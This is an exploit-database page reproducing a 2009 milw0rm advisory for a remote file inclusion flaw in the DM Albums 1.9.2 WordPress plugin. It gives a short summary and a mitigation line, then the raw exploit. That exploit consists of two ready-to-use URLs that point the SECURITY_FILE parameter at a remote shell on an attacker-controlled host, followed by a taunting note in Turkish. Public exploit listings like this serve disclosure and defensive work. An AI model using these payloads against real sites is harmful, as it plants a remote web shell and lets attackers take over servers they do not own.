header-logo
Suggest Exploit
vendor:
DM Albumsâ„¢ 1.9.2 & WordPress Plug-in
by:
Septemb0x
9,3
CVSS
HIGH
Remote File Include
98
CWE
Product Name: DM Albumsâ„¢ 1.9.2 & WordPress Plug-in
Affected Version From: 1.9.2
Affected Version To: 1.9.2
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

DM Albumsâ„¢ 1.9.2 & WordPress Plug-in Remote File Include Vulnerability

A remote file include vulnerability exists in DM Albumsâ„¢ 1.9.2 & WordPress Plug-in. An attacker can exploit this vulnerability to include a remote file containing malicious code and execute it on the vulnerable system.

Mitigation:

Update to the latest version of DM Albumsâ„¢ 1.9.2 & WordPress Plug-in.
Source

Exploit-DB raw data:

#############################################################################################
[+] DM Albumsâ„¢ 1.9.2 & WordPress Plug-in Remote File Include Vulnerability
[+] Author : Septemb0x
[+] www.Cyber-Warrior.Org - Information Technology's World
[+] Greetz : BARCOD3 And All Friends...
[+] Dork : Yok Dork Mork :D
[+] Download Script : http://wordpress.org/extend/plugins/dm-albums/
#############################################################################################
[+] NORMAL EXPLOIT;
[+] http://[sitename]/[path]/template/album.php?SECURITY_FILE=http://attackersite/shell.php
[+] WORDPRESS EXPLOIT
[+] http://[sitename]/[path]/wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://attackersite/shell.php
#############################################################################################
< ---- Note ---- >
H....R;
Sen çok üstün zekaya sahip birisin,
emin olbilirsin, :D
Sql injection ile domain hackleyebilen tek lamersin, :D
ASP'de Rfi Bulmakta Birebirsin,
Ama Gördüğüm En hıyar Lamersin :D
Bu Kafiyelerde Bi Tarafına Girsin ;)
Lol H....R :D
< ---- Note Finished ---- >

# milw0rm.com [2009-06-29]

Navigation

Suggest Exploit

Services By CQR